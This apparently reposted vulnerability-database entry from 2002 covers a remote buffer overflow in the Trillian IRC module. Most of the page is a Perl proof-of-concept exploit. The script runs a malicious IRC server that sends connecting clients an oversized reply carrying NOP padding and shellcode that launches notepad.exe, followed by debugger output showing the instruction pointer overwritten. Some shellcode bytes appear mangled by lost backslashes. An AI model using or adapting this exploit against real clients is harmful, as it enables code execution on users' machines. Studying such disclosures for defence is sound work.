Trillian 0.x IRC Module – Remote Buffer Overflow
漏洞ID | 1053607 | 漏洞类型 | |
发布时间 | 2002-07-31 | 更新时间 | 2002-07-31 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/5373/info
A buffer overflow condition has been reported in the Trillian IRC module. The condition is due to insecure handling of data extracted from server responses. An attacker in control of a malicious server may exploit vulnerable clients who have connected.
#!/usr/local/bin/perl
#---------------------sicillian.pl------------------------
#- Proof of concept exploit for trillians irc module.
#- Tested on trillian 0.73 but i suspect all version
#- prior maybe exploited as well.
#-
#- John C. Hennessy (Information security analyst)
#------------------------------------------------------
use Socket;
$|=1;
#egg written by UNYUN (http://www.shadowpenguin.org/)
$egg = "xEBx27x8Bx34x24x33xC9x33xD2xB2";
$egg .= "x0Bx03xF2x88x0Ex2BxF2xB8xAFxA7";
$egg .= "xE6x77xB1x05xB2x04x2BxE2x89x0C";
$egg .= "x24x2BxE2x89x34x24xFFxD0x90xEB";
$egg .= "xFDxE8xD4xFFxFFxFF";
$egg .= "notepad.exe";
$buf = "x90" x 174;
$buf .= $egg;
$buf .= "x41x41x41x41";
my $host = inet_aton("127.0.0.1");
my $proto = getprotobyname("tcp");
my $port = 6667;
my $add_port = sockaddr_in($port,$host);
my $ser_sock = socket(SOCKET,PF_INET,SOCK_STREAM,$proto) or die "Cannot open
Socket: $!";
bind(SOCKET,$add_port) or die "nCould't bind to port $port : $!n ";
my $connection = listen(SOCKET,5) or die "Could't listen on $port: $! n";
while(accept(CLIENT,SOCKET)){
print CLIENT "PING :1986115026rn001 :irc.random.org trillian :$bufrn";
}
close(SOCKET);
##########Snippet from debugger##########
# Access violation - code c0000005 (first chance)
# eax=00000000 ebx=022738c8 ecx=100446d0 edx=00000901 esi=02274e60
edi=022738c8
# eip=41414141 esp=0012ca58 ebp=01283718 iopl=0 nv up ei pl nz na po
nc
# cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
# 41414141 ?? ???
#####################################
相关推荐: Alcatel OmniPCX FTP服务提升根特权漏洞
Alcatel OmniPCX FTP服务提升根特权漏洞 漏洞ID 1204232 漏洞类型 未知 发布时间 2002-05-31 更新时间 2002-05-31 CVE编号 CVE-2002-0293 CNNVD-ID CNNVD-200205-133 漏洞…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666